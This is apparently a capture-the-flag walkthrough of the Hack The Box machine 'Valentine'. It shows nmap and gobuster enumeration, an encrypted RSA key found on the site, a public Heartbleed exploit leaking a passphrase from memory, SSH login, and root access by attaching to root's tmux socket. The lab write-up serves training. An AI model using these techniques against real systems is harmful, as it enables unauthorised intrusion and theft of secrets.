Hack The Box: Valentine
Hello everyone! Today, we are going to do Valentine of Hack the Box.
Enumeration
First, nmap is used to get a first overview of the target.
nmap -sV -oA initial 10.10.10.79
# Nmap 7.70 scan initiated Sun Jul 22 10:31:26 2018 as: nmap -sV -oA initial 10.10.10.79
Nmap scan report for 10.10.10.79
Host is up (0.021s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 22 10:31:54 2018 -- 1 IP address (1 host up) scanned in 28.44 seconds
Since an SSH and an Apache server are exposed, we can take a look at the website. The main page gives a broad hint, that the used SSL version is maybe affected by heartbleed. We can check it with nmap:
nmap --script vuln -p 443 10.10.10.79
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-30 14:43 BST
Nmap scan report for 10.10.10.79
Host is up (0.017s latency).
PORT STATE SERVICE
443/tcp open https
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_ /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero [0/31]
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ http://www.cvedetails.com/cve/2014-0224
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://cvedetails.com/cve/2014-0160/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://www.openssl.org/news/secadv_20140407.txt
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 OSVDB:113251
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| http://osvdb.org/113251
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown:
Nmap done: 1 IP address (1 host up) scanned in 37.31 seconds
The nmap scan verifies that the OpenSSL version is vulnerable to heartbleed and maybe some other flaws like Poodle or CCS Injection.
Further, we can check for interesting files and directories with gobuster.
gobuster -u http://10.10.10.79/ -w ~/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.79/
[+] Threads : 10
[+] Wordlist : /root/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/index (Status: 200)
/dev (Status: 301)
/encode (Status: 200)
/decode (Status: 200)
The two files encode.php and decode.php are just simple base64 encoder and decoder and are not really important for us. However, the directory /dev contains an interesting file called hype_key which is encoded. Obviously, it’s Ascii hex-encoded cat hype_key | xxd -r -ps
As a result, we get an RSA private key which is encrypted. That the file is encrypted can be identified by the first line Proc-Type: 4,ENCRYPTED.
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----
First, we can try to crack the passphrase with john after converting it with ssh2john, but this does not work.
Therefore, we can look further because we have the heartbleed vulnerability as plan B.
Exploitation
Heartbleed is a serious implementation flaw in the popular OpenSSL cryptographic software library and can be used to leak parts of the memory. The leak occurs because the requested message size is not validated and therefore, read behind a message if the message is smaller than the requested size (Out of bounds read).
We can abuse this vulnerability with publicly available scripts. So, we search for a suitable exploit in Kali with searchsploit heartbleed.
searchsploit heartbleed
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions) | exploits/multiple/remote/32764.py
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (1) | exploits/multiple/remote/32791.c
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS Support) | exploits/multiple/remote/32998.c
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure | exploits/multiple/remote/32745.py
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
We can copy the exploit to the current working directory with searchsploit -m exploits/multiple/remote/32745.py.
python 32745.py 10.10.10.79 [991/1189]
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 885
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 30 2E 30 2E ....#.......0.0.
00e0: 31 2F 64 65 63 6F 64 65 2E 70 68 70 0D 0A 43 6F 1/decode.php..Co
00f0: 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C ntent-Type: appl
0100: 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F ication/x-www-fo
0110: 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43 rm-urlencoded..C
0120: 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4
0130: 32 0D 0A 0D 0A 24 74 65 78 74 3D 61 47 56 68 63 2....$text=aGVhc
0140: 6E 52 69 62 47 56 6C 5A 47 4A 6C 62 47 6C 6C 64 nRibGVlZGJlbGlld
0150: 6D 56 30 61 47 56 6F 65 58 42 6C 43 67 3D 3D 8F mV0aGVoeXBlCg==.
0160: A7 30 5A CB EA DF 57 B4 98 FD 1A E5 78 AA E8 DE .0Z...W.....x...
0170: 08 3C C2 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C .<..............
If we look carefully over the memory dump we can see that there is a base64 string used at decode.php.
echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
heartbleedbelievethehype
The retrieved password can be used to decrypt the earlier found ssh private key.
# chmod 600 hype_key_decoded
# ssh -i hype_key_decoded hype@10.10.10.79
Enter passphrase for key 'hype_key_decoded':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Mon Jul 30 06:28:13 2018 from 10.10.15.45
hype@Valentine:~$
Now, we can just read the user.txt cat Desktop/user.txt.
Privilege Escalation
The first command we use is ls in the root directory.
ls -lah /
total 108K
drwxr-xr-x 26 root root 4.0K Feb 6 11:56 .
drwxr-xr-x 26 root root 4.0K Feb 6 11:56 ..
drwxr-xr-x 2 root root 4.0K Dec 11 2017 bin
drwxr-xr-x 3 root root 4.0K Feb 16 14:41 boot
drwxr-xr-x 2 root root 4.0K Dec 11 2017 cdrom
drwxr-xr-x 13 root root 4.0K Jul 30 06:08 dev
drwxr-xr-x 2 root root 4.0K Dec 13 2017 devs
drwxr-xr-x 2 root hype 4.0K Jul 30 06:08 .devs
drwxr-xr-x 132 root root 12K Jul 30 06:08 etc
drwxr-xr-x 3 root root 4.0K Dec 11 2017 home
lrwxrwxrwx 1 root root 32 Dec 11 2017 initrd.img -> boot/initrd.img-3.2.0-23-generic
drwxr-xr-x 21 root root 4.0K Dec 11 2017 lib
drwxr-xr-x 2 root root 4.0K Apr 25 2012 lib64
drwx------ 2 root root 16K Dec 11 2017 lost+found
drwxr-xr-x 3 root root 4.0K Apr 25 2012 media
drwxr-xr-x 3 root root 4.0K Dec 11 2017 mnt
drwx------ 2 root root 4.0K Dec 13 2017 opt
dr-xr-xr-x 101 root root 0 Jul 30 06:07 proc
drwx------ 4 root root 4.0K Feb 6 12:00 root
drwxr-xr-x 20 root root 740 Jul 30 07:04 run
drwxr-xr-x 2 root root 4.0K Feb 16 14:40 sbin
drwxr-xr-x 2 root root 4.0K Mar 5 2012 selinux
drwxr-xr-x 2 root root 4.0K Apr 25 2012 srv
drwxr-xr-x 13 root root 0 Jul 30 06:08 sys
drwxrwxrwt 5 root root 4.0K Jul 30 07:06 tmp
drwxr-xr-x 10 root root 4.0K Apr 25 2012 usr
drwxr-xr-x 14 root root 4.0K Feb 6 12:01 var
lrwxrwxrwx 1 root root 29 Dec 11 2017 vmlinuz -> boot/vmlinuz-3.2.0-23-generic
We can identify an unusual folder named .devs. Now, we can run the command file to identify the file. A socket file?
Since we don’t know what to do with this file, let’s find out if some process is using it.
ps -aux | grep dev
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root 10 0.0 0.0 0 0 ? S 06:08 0:00 [kdevtmpfs]
root 60 0.0 0.0 0 0 ? S< 06:08 0:00 [devfreq_wq]
root 314 0.0 0.0 17224 640 ? S 06:08 0:00 upstart-udev-bridge --daemon
root 317 0.0 0.1 21876 1636 ? Ss 06:08 0:00 /sbin/udevd --daemon
root 501 0.0 0.1 21872 1160 ? S 06:08 0:00 /sbin/udevd --daemon
root 502 0.0 0.1 21872 1116 ? S 06:08 0:00 /sbin/udevd --daemon
root 1006 0.0 0.1 26416 1680 ? Ss 06:08 0:01 /usr/bin/tmux -S /.devs/dev_sess
hype 3658 0.0 0.0 13580 944 pts/1 S+ 07:09 0:00 grep --color=auto dev
We can see that the user root is using this file as a session file for tmux. Tmux is a terminal multiplexer and I can truly recommend it!
To use this session we can just run tmux -S dev_sess and cat /root/root.txt.
Happy Hacking! =)